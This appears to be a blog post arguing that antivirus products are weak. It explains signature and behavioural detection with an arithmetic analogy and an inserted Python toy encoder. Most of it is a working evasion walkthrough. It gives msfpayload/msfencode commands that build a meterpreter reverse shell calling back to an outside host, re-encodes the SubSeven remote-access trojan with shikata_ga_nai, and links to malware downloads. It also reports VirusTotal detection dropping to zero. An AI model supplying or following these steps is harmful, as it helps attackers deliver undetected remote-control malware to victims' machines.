UPDATE (2016/04/26): files are now located in Malware Samples with the password “malware”
Unfortunately for consumers, antivirus companies seem to promise the world and deliver a terrible product. Why do I think this? With a few minutes of time, Google, and VirusTotal (Ref: VirusTotal and Protecting Yourself From Viruses), I can show you proof of how to take a virus, keep all of its original functionality, and make it undetectable.
How Do AntiVirus Products Work
Antivirus products rely on definitions. Those definitions work primarily by checking whether a file contains a certain “signature”: a particular part of the code that tends to be unique (when it is not, false positives occur) and that can identify the file as malware.
New technologies are trying to combine the traditional signature method of virus detection with behavioral methods. Looking at how code acts, as opposed to what it is, has the benefit of finding malware before it appears in virus definitions. One example of behavioral detection would be a calculator program that tries to change critical Windows system files, send out an email, and connect to a remote server. These are seemingly obvious examples of things a calculator shouldn’t do, but it is hard to say definitively that this is malicious behavior. Maybe the calculator was upgrading a system file to a newer version so it could run correctly, emailing usage reports to the developers, and checking whether there was a newer version of itself. Described that way, it doesn’t sound very malicious.
How Do We Avoid Being Detected?
To avoid having our malware detected, we are going to encode it. Encoding a file takes certain aspects of the way the file works and changes them, while still producing the same output. Think for instance of the following math:
x=5+3
Answer: x=8
Now suppose we used an encoder that finds an addition problem and, for every value in the math higher than 2, subtracts 2 from it, then adds an extra line that adds those values back. Example:
x=3+1 (subtracted 2 from the 5, and 2 from the 3)
x=x+4 (add back the 4 subtracted from the previous line)
Answer: x=8
If we then take what we just made, and RE-encode it:
x=1+1 (subtract 2 from the 3, DO NOT subtract 2 from the 1 as it is too low)
x=x+2 (add back the 2 we subtracted from the last line)
x=x+2 (this is the x=x+4 statement, line 2 from before, with 2 subtracted from it)
x=x+2 (add back the 2 we subtracted from the last line)
Answer: x=8
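To make the analogy concrete, here is the arithmetic encoder above written out in Python. This is an added example, not code from the original post; the statement representation, the function names, and the sample "signature" string are my own assumptions. It shows the two things the post is getting at: a definition that keys on the original bytes ("x=5+3") no longer matches after one or two encoding passes, while running the program (its behaviour) still produces 8 every time.

```python
"""Toy model of the "subtract 2 and add it back" encoder from the post.

A program is a list of statements (assumed representation):
  ("set", a, b)  ->  x = a + b
  ("add", v)     ->  x = x + v
"""

# Constructed sample: the original program x=5+3 and the byte pattern a
# definition-based scanner might use to recognise it.
ORIGINAL = [("set", 5, 3)]
SIGNATURE = "x=5+3"


def render(program):
    """Render a program as source text, one statement per line (the 'bytes')."""
    lines = []
    for stmt in program:
        if stmt[0] == "set":
            lines.append(f"x={stmt[1]}+{stmt[2]}")
        else:
            lines.append(f"x=x+{stmt[1]}")
    return "\n".join(lines)


def evaluate(program):
    """Run the program and return the final x: its observable behaviour."""
    x = 0
    for stmt in program:
        if stmt[0] == "set":
            x = stmt[1] + stmt[2]
        else:
            x += stmt[1]
    return x


def encode(program):
    """One pass of the toy encoder: every literal higher than 2 loses 2, and a
    line adding the removed total back is inserted right after that statement."""
    out = []
    for stmt in program:
        removed = 0
        if stmt[0] == "set":
            vals = []
            for v in stmt[1:]:
                if v > 2:
                    vals.append(v - 2)
                    removed += 2
                else:
                    vals.append(v)  # too low, left alone
            out.append(("set", vals[0], vals[1]))
        else:
            if stmt[1] > 2:
                out.append(("add", stmt[1] - 2))
                removed = 2
            else:
                out.append(stmt)
        if removed:
            out.append(("add", removed))
    return out


def encode_n(program, passes):
    """Re-encode the program the given number of times."""
    for _ in range(passes):
        program = encode(program)
    return program


def signature_match(program, signature=SIGNATURE):
    """What a definition-based scanner does: look for a fixed byte pattern."""
    return signature in render(program)


def scan_report(passes):
    """Compare the two detection approaches against an n-times-encoded program."""
    prog = encode_n(ORIGINAL, passes)
    return {
        "source": render(prog),
        "signature_hit": signature_match(prog),  # static check on the bytes
        "behaviour": evaluate(prog),             # what the code actually does
    }


if __name__ == "__main__":
    for n in range(3):
        r = scan_report(n)
        print(f"--- {n} encoding pass(es) ---")
        print(r["source"])
        print("signature hit:", r["signature_hit"], "| result x =", r["behaviour"])
```

Running it prints the three programs from the post in turn: the signature hits only the unencoded version, while x is 8 in all three. That is the whole argument for behavioural detection in one screen: a scanner that only knows the bytes of the original is blind after a single pass, but anything that watches what the code does sees no change at all.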
So now that you get the idea, it’s time to realize that the way modern day executable encoding actually works is WAY more complicated. Shikata ga nai (ref Metasploit) for instance is polymorphic, meaning it won’t produce the same output if you run it against a file and then repeat the process. Rel1k did some research in this same exact area a little over a year ago on his blog SecManiac. He found that the following process was good enough to get around almost all AntiVirus on VirusTotal:
- Shikata ga nai x5
- Alpha upper x2
- Shikata ga nai x5
- Countdown x5
Getting Down and Dirty
Description: We are just going to make a reverse meterpreter shell here that calls back to rageweb.info.
sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=220.127.116.11 X > /meterpreter.exe
Output File: meterpreter reverse
Virus Total Upload: http://www.virustotal.com/file-scan/report.html?id=a5a69a2a536de2a2320d2b82f8da667c1a6b3119228f941589c4952dab78f046-1302367132
Results: 23/42 (54.8%) found as virus
File Size: 73802 bytes
File Run 1
Description: For this, we are going to make the same reverse meterpreter shell as before, but we are going to encode it with shikata ga nai 1 time.
sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=18.104.22.168 X | ./msfencode -c 1 -e x86/shikata_ga_nai > /meterpreter_1shikata.exe
Output File: meterpreter_1shikata
Virus Total Upload: http://www.virustotal.com/file-scan/report.html?id=ea78c4d602919236fb41c1d0abfea5070dda48896800111e60cff71a0cf642d6-1302396583
Results: 0/42 (0.0%) found as virus
File Size: 321699 bytes
Around the year 2000, a virus named sub7 was extremely popular. It gave you the ability to do all kinds of things on a remote machine (screenshots, play music, etc). I found sub7 at the following site http://www.hackpr.net/~sub7/downloads.shtml
I decided to use version 2.0 for this example, as it was created Sept 19, 1999. 11.5 years old, and unmodified in all that time; surely all of the AVs will detect it?
Description: Unmodified, downloaded from the link above. This is the one in the ss.2.0 folder in the zip file.
Output File: SubSeven
Virus Total Upload: http://www.virustotal.com/file-scan/report.html?id=7981f952e6196fd8228dcc4463d4a26a9dd66ebb327078b4e5e3591d9cd70def-1302483328
Results: 35/40 (87.5%) found as virus
File Size: 428469 bytes
Sub7v2.0 Run 1
Description: For this, we are going to take the sub7 client and encode it with shikata ga nai 1 time.
sudo cat /Downloads/SubSeven.exe | ./msfencode > /Downloads/SubSevenShikata1.exe
Output File: SubSevenShikata1
Virus Total Upload: http://www.virustotal.com/file-scan/report.html?id=a05c2c70ebe5b303f30d0911d9f7db0774988b9ff6df3bd11eb776ae8b95fd2c-1302484220
Results: 0/42 (0.0%) found as virus
File Size: 1867032 bytes
So far we have examined binary files, using an advanced encoder. Magic and unicorns are at work here, so in my next post we will examine a text file (ASP backdoor) and show how to alter it to avoid AV. Link will be here: http://rageweb.info/2011/05/04/bypass-av-part-2-text-edition-from-walking-to-crawling/